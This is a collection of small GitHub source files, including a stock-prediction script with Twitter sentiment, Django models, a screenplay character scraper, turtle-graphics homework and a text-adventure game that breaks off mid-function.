sort = sorted(results, reverse = True, key=lambda tup: tup[0])
percents = percents([val[0] for val in sort])
for x in range (len(sort)):
print(sort[x][1] + ": " + str(percents[x]) + '%')
``` |
{
"source": "2018sjain/stock-predictions",
"score": 3
} |
#### File: 2018sjain/stock-predictions/stock-predict.py
```python
import requests
import sys
import numpy as np
import tweepy
import os
from keras.models import Sequential
from keras.layers import Dense
from textblob import TextBlob
consumer_key = ""
comsumer_secret = ""
access_token = ""
access_secret = ""
login = tweepy.OAuthHandler(consumer_key, comsumer_secret)
login.set_access_token(access_token, access_secret)
user = tweepy.API(login)
file = 'historical.csv'
def get_name(symbol):
url = "http://d.yimg.com/autoc.finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
result = requests.get(url).json()
for x in result['ResultSet']['Result']:
if x['symbol'] == symbol:
return x['name']
def sentiment(quote, num):
tweet_list = user.search(get_name(quote), count = num)
positive = 0
null = 0
for tweet in tweet_list:
check = TextBlob(tweet.text).sentiment
if check.subjectivity == 0:
null += 1
next
if check.polarity > 0:
positive += 1
if positive > ((num - null)/2):
return True
def get_data(quote):
url = 'http://www.google.com/finance/historical?q=NASDAQ%3A'+quote+'&output=csv'
r = requests.get(url, stream = True)
if r.status_code != 400:
with open(file, 'wb') as fl:
for line in r:
fl.write(line)
return True
def predict():
data = []
with open(file) as f:
for num, line in enumerate(f):
if num != 0:
data.append(float(line.split(',')[1]))
data = np.array(data)
def create_set(data):
datax = [data[n+1] for n in range(len(data)-2)]
return np.array(datax), data[2:]
trainx, trainy = create_set(data)
classifier = Sequential()
classifier.add(Dense(8, input_dim = 1, activation = 'relu'))
classifier.add(Dense(1))
classifier.compile(loss = 'mean_squared_error', optimizer = 'adam')
classifier.fit(trainx, trainy, nb_epoch= 200, batch_size = 2, verbose = 2)
prediction = classifier.predict(np.array([data[0]]))
return 'from %s to %s' % (data[0], prediction[0][0])
quote = input('Enter stock quote: ').upper()
if not get_data(quote):
print ('ERROR, please re-run the script')
print(predict())
if not sentiment(quote, num = 100):
print ('This stock has bad sentiment')
else:
print ('This stock has good sentiment')
os.remove(file)
``` |
{
"source": "201901407/woc3.0-eventmanager-DarshilParikh",
"score": 2
} |
#### File: EventManager/Home/models.py
```python
from django.db import models
import uuid, datetime
from django.utils import timezone
# Create your models here.
class User(models.Model):
user_id = models.CharField(max_length=100,default=uuid.uuid4)
email = models.EmailField(max_length=100)
name = models.CharField(max_length=100)
password = models.CharField(max_length=250)
def getUserDetails(self):
return self.email
class Event(models.Model):
event_id = models.CharField(max_length=100,default=uuid.uuid4)
event_name = models.CharField(max_length = 120)
event_start = models.DateTimeField()
event_end = models.DateTimeField()
host_email = models.EmailField(max_length = 100)
host_name = models.CharField(max_length = 100)
event_description = models.CharField(max_length = 300)
registration_deadline = models.DateTimeField(default=timezone.now)
event_poster = models.URLField(max_length=150,default = '')
def getEventDetails(self):
return [self.event_name,self.event_start,self.event_end,self.host,self.event_description]
class Participant(models.Model):
pevent_id = models.CharField(max_length=100)
participant_email = models.EmailField(max_length = 100)
participant_name = models.CharField(max_length=100)
participant_contactno = models.IntegerField()
group_registration = models.BooleanField()
no_of_members = models.IntegerField()
``` |
{
"source": "2019-20-TFG-Presencial-Febr/PruebaNetExtractor",
"score": 3
} |
#### File: src/Guiones/CrearDiccionario.py
```python
import urllib
from bs4 import BeautifulSoup
class CrearDiccionario:
"""
Clase que crea un diccionario de manera automática
Args:
modusuario: instancia de la clase modelo
"""
def __init__(self, modusuario):
self.mod = modusuario
def obtenerPersPelicula(self, url):
"""
Método para crear un diccionario de personajes para un guion a partir de una url introducida por el usuario
Args:
url: string con la url introducida
Return:
formato: int que contiene 1 si la estructura del guion es correcta y 0 si no lo es
"""
lista = list()
formato = 0
web = urllib.request.urlopen(url)
html = BeautifulSoup(web.read(), "html.parser")
for pers in html.find_all("b"):
if(not len(pers) == 0):
pn = pers.contents[0]
pn = str(pn)
pn = pn.strip()
if (not '<' in pn and not '>' in pn and not 'EXT.' in pn and not 'INT.' in pn and not 'INT ' in pn and not 'EXT ' in pn and not '.' in pn and not ':' in pn and not ';' in pn and not '"' in pn and not '!' in pn and not '?' in pn and not ',' in pn and len(pn)<30 and not 'Genres' in pn and not 'Writers' in pn and not '_' in pn):
if (not pn in lista):
if(not pn == ''):
lista.append(pn)
self.mod.anadirPersonaje(pn,pn)
if ('EXT. ' in pn or 'INT. ' in pn or 'INT ' in pn or 'EXT ' in pn):
pers = pn.split(' ')
for i in pers:
if('EXT' == i or 'INT' == i or 'EXT.' == i or 'INT.' == i):
formato = 1
return formato
```
#### File: src/LecturaFicheros/Lectorcsv.py
```python
import csv
class Lectorcsv:
"""
Clase para importar y exportar diccionarios de personajes
Args:
m: instancia de la clase modelo
"""
def __init__(self,m):
self.__modelo = m
def importDict(self, fichero):
"""
Metodo que importa un diccionario de personajes que tenga una estructura predeterminada
Args:
fichero: ruta al fichero csv a importar
"""
i = 0
x= True
with open(fichero, newline='', encoding='utf-8') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',',skipinitialspace=True)
for row in spamreader:
if(x):
x = False
else:
if (i%2 ==0):
i+=1
actual = row[0]
self.__modelo.anadirPersonaje(actual,actual)
else:
i+=1
for n in row:
self.__modelo.anadirReferenciaPersonaje(actual,n)
def exportDict(self, fichero):
"""
Metodo que exporta el diccionario de personajes actual a un fichero csv con una estructura
igual a la de los ficheros de importación
Args:
fichero: ruta donde exportar el diccionario
"""
pers = self.__modelo.getPersonajes()
with open(fichero, mode='w', newline='', encoding='utf-8') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=',')
spamwriter.writerow('Diccionario')
for persk in pers.keys():
spamwriter.writerow([persk])
spamwriter.writerow(pers[persk].getPersonaje().keys())
``` |
{
"source": "2019342a/emoji-bot",
"score": 2
} |
#### File: 2019342a/emoji-bot/main.py
```python
from src.bot import BotClient
from src.constants import KEY
def main():
"""
Runs the bot.
"""
client = BotClient()
client.run(KEY)
if __name__ == "__main__":
main()
``` |
{
"source": "2019342a/reporter",
"score": 3
} |
#### File: reporter/tests/test_utils.py
```python
from unittest.mock import patch
from .context import create_reporter
from .context import format_args
from .context import format_kwargs
@patch("logging.Logger.addHandler")
def test_create_reporter(mock_process):
create_reporter()
assert mock_process.called
def test_format_args():
integers = [1, 2, 3]
strings = ["a", "b", "c"]
assert format_args(integers) == "args 1 2 3"
assert format_args(strings) == "args a b c"
def test_format_kwargs():
kwargs = {1: 2, 2: 3}
assert format_kwargs({}) == ""
assert format_kwargs(kwargs) == ", kwargs 1=2 2=3"
``` |
{
"source": "2019342a/solid-palm-tree",
"score": 4
} |
#### File: solid-palm-tree/src/parse.py
```python
import csv
SF_FILE = "data/sample_sfpd_incident_all.csv"
def parse(raw_file, delimiter):
"""Parses a raw CSV file to a JSON-line object."""
parsed_data = []
opened_file = open(raw_file)
csv_data = csv.reader(opened_file, delimiter=delimiter)
fields = csv_data.next()
for row in csv_data:
parsed_data.append(dict(zip(fields, row)))
opened_file.close()
return parsed_data
``` |
{
"source": "2019342a/ubiquitous-octo-pancake",
"score": 2
} |
#### File: {{cookiecutter.app_name}}/tests/test_models.py
```python
def test_basic():
assert 4 == 4
``` |
{
"source": "2019-a-gr1-python/py-guevara-sanandres-juan-diego",
"score": 3
} |
#### File: py-guevara-sanandres-juan-diego/Deber_2_Rompecabezas/Jigsaw.py
```python
import math
import random
import numpy as np
import matplotlib.pyplot as plt
##import matplotlib.image as mpimg
class Puzzle:
def __init__(self):
self.imagen = plt.imread('Z:/junt_/Pictures/Backgrounds/thanos.jpg')
self.rows_croped_image_list = None
self.rows_croped_image_array = None
self.columns_croped_image_list = []
##self.columns_croped_image_array = []
self.rows = 0
self.columns = 0
self.img = None
def createJigsaw(self,dimensions):
self.img = np.array(self.imagen)
self.rows_croped_image_list = np.vsplit(self.img,int(dimensions[0]))
random.shuffle(self.rows_croped_image_list)
for i in range(0,int(dimensions[0])):
self.columns_croped_image_list.append(np.hsplit(self.rows_croped_image_list[i],int(dimensions[1])))
random.shuffle(self.columns_croped_image_list[i])
self.rows_croped_image_list[i] = np.hstack(self.columns_croped_image_list[i])
self.rows_croped_image_array = np.vstack(self.rows_croped_image_list)
plt.imshow(self.rows_croped_image_array)
plt.show(block=False)
def changePiece(self,pos_piece_A,pos_piece_B):
pos_x_piece_A = math.ceil(pos_piece_A/self.columns) - 1
pos_y_piece_A = pos_piece_A - (pos_x_piece_A*self.columns) -1
pos_x_piece_B = math.ceil(pos_piece_B/self.columns) - 1
pos_y_piece_B = pos_piece_B - (pos_x_piece_B*self.columns) -1
list_aux_1 = self.columns_croped_image_list[pos_x_piece_A]
piece_1 = list_aux_1[pos_y_piece_A]
list_aux_2 = self.columns_croped_image_list[pos_x_piece_B]
piece_2 = list_aux_2[pos_y_piece_B]
list_aux_1[pos_y_piece_A] = piece_2
list_aux_2[pos_y_piece_B] = piece_1
self.rows_croped_image_list[pos_x_piece_A] = np.hstack(list_aux_1)
self.rows_croped_image_list[pos_x_piece_B] = np.hstack(list_aux_2)
self.rows_croped_image_array = np.vstack(self.rows_croped_image_list)
plt.imshow(self.rows_croped_image_array)
plt.show(block=False)
def main(self):
keyboard_entry = None
plt.imshow(self.imagen)
plt.show(block=False)
entry = input("Ingrese en cuantas filas y columnas desea que esté dividido su rompecabezas. Ejemplo: 9,4\n")
dimensions = entry.split(",")
self.rows = int(dimensions[0])
self.columns = int(dimensions[1])
num_pieces = self.rows*self.columns
self.createJigsaw(dimensions)
print(f"Se han generado {num_pieces} piezas númeradas desde la esquina superior derecha")
while keyboard_entry != 'q':
if(np.array_equal(self.img,self.rows_croped_image_array)):
print("Felicidades ganaste")
break
else:
keyboard_entry = input("Ingrese las 2 piezas que quiere cambiar separadas por coma. Ejemplo: 12,1\nPresione q si desea salir\n")
if(keyboard_entry != 'q'):
pieces = keyboard_entry.split(",")
piece_A = int(pieces[0])
piece_B = int(pieces[1])
if(1<=piece_A<=num_pieces and 1<=piece_B<=num_pieces):
self.changePiece(piece_A,piece_B)
else:
print("Escribe bien")
Puzzle().main()
``` |
{
"source": "2019CapstoneDesign/CD4_FastQuest",
"score": 2
} |
#### File: TT/api/models.py
```python
from django.utils.timezone import now
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
import datetime
class LargeCat(models.Model):
lcat_name = models.CharField(db_column='Lcat_name', primary_key=True, max_length=50) # Field name made lowercase.
class Meta:
db_table = 'large_cat'
def __str__(self):
return self.lcat_name
class Category(models.Model):
cat_name = models.CharField(primary_key=True, max_length=50)
lcat_name = models.ForeignKey(LargeCat, models.DO_NOTHING, db_column='Lcat_name', blank=True, null=True) # Field name made lowercase.
activity_rate = models.IntegerField(blank=True, null=True)
sociality_rate = models.IntegerField(blank=True, null=True)
class Meta:
db_table = 'category'
def __str__(self):
return self.cat_name
class Activity(models.Model):
act_id = models.AutoField(primary_key=True)
title = models.CharField(max_length=100)
category = models.ForeignKey(Category, models.DO_NOTHING, db_column='category')
content = models.TextField(blank=True, null=True)
longterm = models.CharField(max_length=1, blank=True, null=True)
outside = models.CharField(max_length=1, blank=True, null=True)
address = models.CharField(max_length=100, blank=True, null=True)
latitude = models.FloatField(blank=True, null=True)
longitude = models.FloatField(blank=True, null=True)
class Meta:
db_table = 'activity'
def __str__(self):
return '%s. %s' % (self.act_id, self.title)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
nickname = models.CharField(max_length=30, blank=True, null=True)
score = models.IntegerField(default=0, blank=True, null=True)
activity = models.IntegerField(blank=True, null=True)
sociality = models.IntegerField(default=100, blank=True, null=True)
gender = models.CharField(default='M', max_length=10, blank=True, null=True)
age = models.IntegerField(blank=True, null=True)
created = models.DateTimeField(default=now, blank=True, null=True)
class Meta:
db_table = 'profile'
def __str__(self):
return '%s %s' % (self.user.username, self.user.email)
# return self.user.username
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
class Assemble(models.Model):
title = models.CharField(max_length=50, blank=True, null=True)
category = models.ForeignKey(Category, models.DO_NOTHING, blank=True, null=True)
content = models.TextField(blank=True, null=True)
time = models.DateTimeField(default=now, blank=True, null=True)
photo = models.ImageField(default='default_image.jpeg')
author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True)
class Meta:
db_table = 'assemble'
def __str__(self):
return self.title
class Feed(models.Model):
act = models.ForeignKey(Activity, models.DO_NOTHING)
title = models.CharField(max_length=50, blank=True, null=True)
content = models.TextField(blank=True, null=True)
time = models.DateTimeField(default=now, blank=True, null=True)
author = models.ForeignKey(Profile, models.DO_NOTHING, blank=True, null=True)
image = models.ImageField(default='default_image.jpeg')
class Meta:
db_table = 'feed'
def __str__(self):
return '%s. %s' % (self.act, self.title)
class PreCat(models.Model):
#id = models.AutoField(primary_key=True)
user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='user_id')
cat_name = models.ForeignKey(Category, models.DO_NOTHING, db_column='cat_name')
class Meta:
db_table = 'pre_cat'
unique_together = (('user', 'cat_name'),)
def __str__(self):
return '%s: %s' % (self.user, self.cat_name)
class Takes(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING, db_column='userid')
act = models.ForeignKey(Activity, models.DO_NOTHING)
star = models.IntegerField(default=3, blank=True, null=True)
date = models.DateField(default=datetime.date.today)
class Meta:
db_table = 'takes'
unique_together = (('id', 'act', 'date'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.act)
class Challenge(models.Model):
cat_name = models.CharField(max_length=50)
act_name = models.CharField(max_length=50)
content = models.TextField(blank=True, null=True)
image = models.ImageField(default='default_image.jpeg')
def __str__(self):
return '%s. %s' % (self.cat_name, self.act_name)
class LikeFeed(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING)
feed = models.ForeignKey(Feed, models.DO_NOTHING)
class Meta:
db_table = 'likefeed'
unique_together = (('id', 'feed'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.feed)
class LikeAssemble(models.Model):
user = models.ForeignKey(Profile, models.DO_NOTHING)
assemble = models.ForeignKey(Assemble, models.DO_NOTHING)
class Meta:
db_table = 'likeassemble'
unique_together = (('id', 'assemble'),)
def __str__(self):
return '%s. %s' % (self.user.user.username, self.assemble)
``` |
{
"source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02",
"score": 4
} |
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-manalais-a02/a02_manalais.py
```python
import turtle
def icecream_cone(cone):
cone.penup()
cone.pensize(3)
cone.setpos(25, 25)
cone.color('tan')
cone.pendown()
cone.fillcolor('tan')
cone.begin_fill()
cone.right(70)
cone.forward(102)
cone.left(70)
cone.forward(40)
cone.right(-75)
cone.forward(100)
cone.left(105)
cone.forward(100)
cone.end_fill()
def icecream_circle(circle):
circle.penup()
circle.setpos(75, 100)
circle.pensize(3)
circle.color('pink')
circle.pendown()
circle.fillcolor('pink')
circle.begin_fill()
circle.circle(-52)
circle.end_fill()
def random0(random):
random.penup()
random.setpos(-45,40)
random.pensize(6)
random.color('blue')
random.pendown()
random.fillcolor('blue')
random.begin_fill()
for side in range(2):
random.forward(60)
random.right(90)
random.forward(60)
random.right(90)
random.end_fill()
def main():
wn = turtle.Screen()
cone = turtle.Turtle()
circle = turtle.Turtle()
random = turtle.Turtle()
icecream_cone(cone)
icecream_circle(circle)
random0(random)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02",
"score": 4
} |
#### File: 2019-fall-csc-226/a02-loopy-turtles-loopy-languages-sontayvicentej-a02/a02_sontayvicentej.py
```python
import turtle
wn = turtle.Screen()
jhonny = turtle.Turtle()
another = turtle.Turtle()
jhonny.color()
def square(t, distance):
""" Draws a square"""
for k in ["red", "yellow", "orange", "blue"]:
t.color(k)
t.forward(distance)
t.left(90)
for i in range(3):
jhonny.forward(80)
jhonny.left(36)
for i in range(3):
jhonny.forward(80)
jhonny.left(36)
size = 15
for i in range(10):
square(jhonny, 76)
size = size+15
jhonny.forward(80)
jhonny.left(36)
wn.exitonclick()
``` |
{
"source": "2019-fall-csc-226/a03-master",
"score": 3
} |
#### File: 2019-fall-csc-226/a03-master/a03_barnwellj.py
```python
import turtle
sc = turtle.Screen()
sc.bgcolor("#ADD8E6")
ht = turtle.Turtle()
ht.pensize(15)
ht.penup()
ht.setpos(-200, 0)
ht.pendown()
ht.speed(10)
def draw_square(ht):
ht.fillcolor("#FFFF33")
ht.begin_fill()
for a in range(4): #draws the main part of the house
ht.fd(300)
ht.right(90)
ht.end_fill()
pass
def drawtriangle(ht):
ht.fillcolor("#ff0000")
ht.begin_fill()
for t in range(3): #draws the roof of the house
ht.fd(150)
ht.left(120)
ht.fd(150)
ht.end_fill()
def drawwindow(ht):
ht.fillcolor("#0000FF")
ht.begin_fill()
for w in range(4):
ht.fd(100)
ht.right(90)
ht.end_fill()
pass
def drawdoor(ht):
ht.fillcolor("#D2691E")
ht.begin_fill()
ht.fd(50)
ht.right(90)
ht.forward(90)
ht.right(90)
ht.fd(100)
ht.right(90)
ht.fd(90)
ht.right(90)
ht.fd(80)
ht.end_fill()
ht.right(90)
ht.penup()
ht.fd(55)
def drawgrass(ht): #Function to create grass underneath the house
ht.setpos(-690, -315)
ht.right(90)
ht.pendown()
ht.pencolor("#228B22")
ht.fillcolor("#228B22") #Changes the fill color to green
ht.begin_fill()
ht.fd(1500)
ht.right(90)
ht.fd(30)
ht.right(90)
ht.fd(1500)
ht.right(90)
ht.fd(30)
ht.end_fill()
def stick(ht):
ht.color("#000000") #setting color and pensize for the stick figure
ht.pensize(5)
ht.left(120) #draws the stick figure
ht.fd(50)
ht.right(120)
ht.fd(55)
ht.right(180)
ht.fd(55)
ht.right(30)
ht.pendown()
ht.fd(50)
ht.right(45)
ht.fd(50)
ht.right(180)
ht.fd(100)
ht.left(180)
ht.fd(50)
ht.left(15)
ht.fd(5)
ht.circle(30)
def message(ht):
ht.setpos(70, -20) #tells turtle to write a message on the screen
ht.color("#000000")
style = ('Courier', 20, 'italic')
ht.write("Hello, and Welcome to my Home!!!", font=style, )
def main():
drawtriangle(ht) #starts drawing the house, beginning with the roof
ht.fd(150)
ht.right(90)
draw_square(ht)
ht.fd(120) #draws the main part of the house, and sets position of turtle
ht.right(90)
ht.penup()
ht.fd(40)
ht.pendown() #positions the turtle and draws the window
drawwindow(ht)
ht.penup()
ht.fd(120)
ht.pendown()
drawwindow(ht) #draws the second window
ht.penup()
ht.setpos(-200, -300) #postitions the turtle and draws a door
ht.pendown()
drawdoor(ht)
drawgrass(ht)
ht.penup()
ht.right(90)
ht.fd(1000)
ht.left(90)
ht.fd(10)
ht.right(145)
ht.pendown()
stick(ht)
ht.penup()
ht.fd(50)
message(ht)
#draws grass below the house
main()
sc.exitonclick()
```
#### File: 2019-fall-csc-226/a03-master/a03_schweinsbergs.py
```python
import turtle
def CreateHead(turtle):
"""
Creates the head for the puppy we're making!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.setpos(100,-50)
turtle.pendown()
turtle.color("#bd9f60")
turtle.shape('arrow')
turtle.begin_fill()
for head in range(4):
turtle.left(90)
turtle.forward(200)
turtle.end_fill()
def CreateEars(turtle):
"""
Creates the ears for the puppy we're making!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.setpos(100,150)
turtle.pendown()
turtle.color("#615232")
turtle.shape('arrow')
turtle.begin_fill()
for ears in range(2):
turtle.forward(100)
turtle.right(90)
turtle.forward(300)
turtle.right(90)
turtle.end_fill()
turtle.penup()
turtle.setpos(-200,150)
turtle.pendown()
turtle.begin_fill()
for earstwo in range(2):
turtle.forward(100)
turtle.right(90)
turtle.forward(300)
turtle.right(90)
turtle.end_fill()
def DrawEyes(turtle):
"""
Gives eyes to the puppy we're drawing!
:return: none
"""
turtle.penup()
turtle.speed(0)
turtle.color('light blue')
turtle.shape('arrow')
turtle.setpos(-70,100)
turtle.pendown()
turtle.begin_fill()
for eyesone in range(4):
turtle.forward(30)
turtle.right(90)
turtle.end_fill()
turtle.penup()
turtle.setpos(40,100)
turtle.pendown()
turtle.begin_fill()
for eyestwo in range(4):
turtle.forward(30)
turtle.right(90)
turtle.end_fill()
turtle.penup()
def DrawNose(turtle):
turtle.penup()
turtle.setpos(-15,40)
turtle.shape('arrow')
turtle.color('light pink')
turtle.pendown()
turtle.begin_fill()
for nose in range(3):
turtle.forward(30)
turtle.left(-120)
turtle.end_fill()
def DrawMouth(turtle):
"""
Makes a mouth and tongue for our puppy!
"""
turtle.penup()
turtle.color('black')
turtle.setpos(-50,20)
turtle.pendown()
turtle.right(90)
turtle.forward(30)
turtle.left(90)
turtle.forward(100)
turtle.left(90)
turtle.forward(30)
turtle.penup()
turtle.color('red')
turtle.setpos(-20,-11)
turtle.pendown()
turtle.begin_fill()
for tongue in range(2):
turtle.right(90)
turtle.forward(40)
turtle.right(90)
turtle.forward(90)
turtle.penup()
turtle.setpos(700,700)
turtle.end_fill()
def main(turtle):
"""
Calls all of the functions in order so that the puppy can be drawn!
:return: none
"""
wn = turtle.Screen()
wn.bgcolor('light green')
CreateHead(turtle)
CreateEars(turtle)
DrawEyes(turtle)
DrawNose(turtle)
DrawMouth(turtle)
wn.exitonclick()
main(turtle)
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03",
"score": 4
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-eubanksn-belainehi-t03/project.py
```python
import turtle
def boustrophedon(g):
"'This function fills up the square in a bustrophedon pattern.'"
#draws the inner filings
g.penup()
g.setpos(-170, 170)
g.pendown()
for w in range(45):
g.color("yellow")
g.speed(10)
g.right(90)
# side.forward(5)
g.left(90)
g.forward(440)
g.right(90)
g.forward(5)
g.right(90)
g.forward(440)
g.left(90)
g.forward(5)
g.left(90)
def square (side):
"'This function draws the square. '"
# draw square
for i in range(2):
side.forward(500)
side.right(90)
side.forward(500)
side.right(90)
def main():
"'This is where the two functions come together. "''
#Create a window
wn = turtle.Screen()
wn.bgcolor("white")
#Create a turtle
side = turtle.Turtle()
side.penup()
side.setpos(-200,200)
side.pendown()
side.pensize(30)
#draw the insides
square (side)
boustrophedon (side)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3",
"score": 4
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-maynardb_conceptanjolima_t3/t03_stub.py
```python
import turtle
def outside_square(t, l):
"""
creates a border square
param t: a turtle object
param l:the length of the square
return: none
"""
for i in range(4):
t.forward(l)
t.left(90)
# ...
def draw_pattern(t, l, h):
"""
draw the pattern inside the border square
param t: turtle input
param l: length of the inside design
param h: height of the design
return: none
"""
for i in range(11):
t.forward(l)
t.left(90)
t.forward(h)
t.left(90)
t.forward(l)
t.right(90)
t.forward(h)
t.right(90)
# ...
def main():
"""
sets up attributes and calls functions
return: none
"""
# ...
wn = turtle.Screen()
scott = turtle.Turtle()
scott.pensize(20)
scott.penup()
scott.setpos(250, 250)
scott.left(180)
scott.pendown()
outside_square(scott, 500) # Function call to function_1
scott.penup()
scott.setposition(230, 230)
scott.pendown()
scott.color("red")
draw_pattern(scott, 460, 20) # Function call to function_2
scott.forward(460)
scott.left(90)
scott.forward(20)
scott.left(90)
scott.forward(460)
wn.exitonclick()
main()
``` |
{
"source": "2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03",
"score": 3
} |
#### File: 2019-fall-csc-226/t03-boustrophedon-turtles-meadors-frank-t03/t03_stub.py
```python
import turtle
#################################################################################
# define functions to create a square using
#################################################################################
def square_turtle(name, x, y, size):
"""
Creates a square of defined size.
"""
name.penup()
name.goto(x, y)
name.pendown()
name.setheading(0)
for side in range(4):
name.forward(size)
name.left(90)
def squiggle_right(meadors):
"""
Uses turtle to fill a line left to right
"""
for cross_space in range(12):
for first_arc in range(2):
meadors.forward(20)
meadors.right(90)
for second_arc in range(2):
meadors.forward(20)
meadors.left(90)
def squiggle_left(t):
"""
Uses Turtle to fill a line from right to left
"""
for cross_space in range(12):
for first_arc in range(2):
t.left(90)
t.forward(20)
for second_arc in range(2):
t.right(90)
t.forward(20)
# ...
def main():
"""
Function Starts all the other functions
Makes and fills a square
"""
wn = turtle.Screen()
wn.bgcolor('black')
meadors = turtle.Turtle()
meadors.color('deep sky blue')
meadors.pensize(20)
meadors.speed(0)
# Call function to make square and size it
square_turtle(meadors, -260, -260, 520)
# move turtle to fill start point
meadors.penup()
meadors.pencolor('green')
meadors.goto(-240, -240)
meadors.pendown()
meadors.setheading(90)
# call both squiggle functions to fill in area
for fill in range(6):
squiggle_right(meadors)
meadors.forward(60)
squiggle_left(meadors)
meadors.forward(20)
# ...
# fill in last remaining line
meadors.right(90)
meadors.forward(480)
wn.exitonclick()
############################################################################
# set up the screen and turtle, then let the main function do its things
############################################################################
main()
``` |
{
"source": "2019-fall-csc-226/t04-master",
"score": 4
} |
#### File: 2019-fall-csc-226/t04-master/t04_refactored.py
```python
import random
from time import sleep
delay = 1.0 # change to 0.0 for testing/speed runs; larger for dramatic effect!
dead = False
def start_story():
"""
Introduction text for the story. Don't modify this function.
:return: the user's name, captured from user input
"""
user = input("What do they call you, unworthy adversary? ")
print()
print("Welcome,", user, ", to the labyrinth")
sleep(delay)
print("Before you lies two paths. One path leads to treasures of unimaginable worth.")
print("The other, certain death. Choose wisely.")
print()
sleep(delay * 2)
print("You are in a dark cave. You can see nothing.")
print("Staying here is certainly not wise. You must find your way out.")
print()
sleep(delay)
return user
def end_story(user):
"""
This is the ending to the story. Don't modify this function, either.
:param user: the user's name
:return: None
"""
print(
"Congratulations, " + user + ", you have made it to the end of this... strange... adventure. I hope you feel accomplished.")
print()
print()
print()
sleep(delay * 5)
print("Now go play again.")
def kill_if_dead(dead):
"""
Simple function to check if you're dead
:param dead: A boolean value where false let's the story continue, and true ends it.
:return: None
"""
if dead:
quit()
###################################################################################
def scott_adventure():
"""
My original adventure text I gave as an example. Leave it alone as well.
:return: None
"""
global dead # You'll need this to be able to modify the dead variable
direction = input("Which direction would you like to go? [North/South/East/West]")
if direction == "North":
# Good choice!
print("You are still trapped in the dark, but someone else is there with you now! I hope they're friendly...")
sleep(delay)
elif direction == "South":
# Oh... Bad choice
print("You hear a growl. Not a stomach growl. More like a big nasty animal growl.")
sleep(delay)
print("Oops. Turns out the cave was home to a nasty grizzly bear. ")
print("Running seems like a good idea now. But... it's really, really dark.")
print("You turn and run like hell. The bear wakes up to the sound of your head bouncing off a low stalactite. ")
print()
sleep(delay * 2)
print("He eats you. You are delicious.")
dead = True
else:
# Neutral choice
print(
"You're in another part of the cave. It is equally dark, and equally uninteresting. Please get me out of here!")
sleep(delay)
kill_if_dead(dead)
###################################################################################
def team_1_adv():
global dead
sleep(delay * 2)
print("\n\nYou continue on with your journey. You happen to stumble across a bomb.")
print("God offers you some wirecutters. With nothing to lose, you decide to be a hero.")
print("You unscrew the bomb. In front of you are three wires: red, blue, and yellow.")
sleep(delay * 2)
print("Which wire will you choose, dude?")
color = input("Red, Blue, or Yellow?")
if color == "red":
# The good choice
print("You suck in a breath and then cut the wire. The LEDs flicker, then shut off. You did it!")
elif color == "blue":
# The bad choice
print("You suck in a breath and then cut the wire. ")
print("The bomb explodes into a white light. You die instantly.")
dead = True
else:
print("You suck in a breath and cut the yellow wire.")
print("")
print("Nothing explicitly happens, but suddenly you have a loaf of banana nut bread in your pocket.")
print("... You decide to move on.")
kill_if_dead(dead)
"""This function runs one room where you have to choose which wire to cut in a bomb. Choose wisely!"""
def team_2_adv():
######################################################################
# Author: <NAME> & <NAME>
# Username: zapatamezaj & maynardb
#
# Assignment: T04: Adventure in Gitland
#
# Purpose: To recreate a choose-your-own-adventure style game
# by refactoring T01.
######################################################################
"""
Google Document Link:
https://docs.google.com/document/d/1N2BXxH4VsnbuLDMHqq_gNpbawFb-_D3vbwr5oPuuR8g/edit?usp=sharing"""
global dead
print("Congratulations! \n"
"You have survived so far. But the journey does not end for the gold still lays undiscovered. \n ")
sleep(delay * 2)
direction = input("Which way would you like to go now? Choose wisely North, East, West or South?\n")
if direction == "East":
# Good choice
print("You have proven how worthy you are so the gods have decided to reward you with Gold. \n "
"You are rich now go home and spread your wealth! \n")
elif direction == "North":
# Bad choice
print("This trip is only for the worthy. You have been found unworthy and the gods have sacked your soul.\n")
dead = True
elif direction == "West":
# Bad choice
print("Some wolves come by and urinate all over your stuff, then eat your face off. \n"
"Tragic, you could have been rich but now you're dead.")
dead = True
else:
print("You were found by a group of robbers. They know you have enough food and gold to last you days. \n"
"They loot you and leave you for the bears.")
dead = True
sleep(delay)
kill_if_dead(dead)
print("You're in the cave, its night time and you began to hear screams from one of two paths.")
direction = input("Which path will you take, East or West? Choose wisely.")
if direction == "East":
print("""Congratulations! You have found the exit and have made it out with only a few scratches
and maybe some broken bones, but look on the bright side, at least you're alive.""")
else:
print("You become curious of the screams and follow them. \n"
"You stumble upon a group of rich cave people that party and they invite you to join them")
kill_if_dead(dead)
def team_3_adv():
"""
Authors: <NAME>
Google Link: https://docs.google.com/document/d/1OFzXphHUyPa6YQpFq5rVqsW-1NFc8JwoCqsTKO79Lbw/edit?usp=sharing
:return: N/A
"""
username = input("What do you call yourself?")
action = input_action()
ask_action(username, action)
sleep(delay)
def input_action():
"""
Starts the story, asks user to select an option.
:return: Returns the result of the variable 'action'.
"""
print("You are being chased by a group of goblins.")
print("You and your friend for some reason decide to run to a cliff. What do you do?")
action = input("[Sleep | Jump | Do Nothing | Fight] ")
